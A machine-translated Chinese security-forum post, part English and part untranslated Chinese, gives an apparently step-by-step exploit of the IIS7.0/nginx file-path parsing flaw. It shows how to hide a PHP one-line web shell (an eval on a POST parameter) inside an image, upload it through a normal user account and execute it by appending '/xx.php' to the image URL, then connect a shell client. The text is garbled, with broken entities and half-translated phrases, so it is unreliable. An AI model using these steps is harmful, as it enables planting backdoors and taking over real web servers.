IIS7. 0 website, the exploit and the Fix-vulnerability warning-the black bar safety net

ID MYHACK58:62201233031
Type myhack58
Reporter 佚名
Modified 2012-02-05T00:00:00


To the currently popular PHP as an example:

To merge a PHP word pictures of horses, the combined method:

① , DOS merge: copy 1.gif /b + 1. txt/a php.gif

② , With edjpgcom, make picture and word Trojan of the merger, remark Code of<? php eval($_POST[meckun]);?& gt;

Pictures just to find one.

【Incidentally, with the way edjpgcom the use of method: open the edjpgcom. exe the folder, and then put what you want to modify the picture and drag to the edjpgcom. exe above, and then edjpgcom. exe will automatically open, write want some of the code.


<? php eval($_POST[meckun]);?& gt;

Then find a nginx site,first register a user and then in the forum Upload a picture we just combined The pictures in a word horse.

Find the picture address,然后 在地 址 后面 加 个 xx.php that run in the browser.

比如 假设 图片 地址 为 www.meckun.cn/upload/1.jpg

则 执行 地址 为 www.meckun.cn/upload/1.jpg/xx.php

Then,会 在 目录 下 生成 xx.php the. 比如 :www.meckun.cn/upload/x.php

x. php is our word address. Then take the Word of the client connected to this word address.

Find a used IIS7. 0 the erection of the station, and then find where the picture upload point does not require administrative permissions, the ordinary registered user can get, the 把 PHP 大马 后缀 改成 .jpg, transfer up, get the picture address.

在 图片 格式 后面 添加 xx.php

Note: xx whatever you want to fill. As long as the suffix. php just fine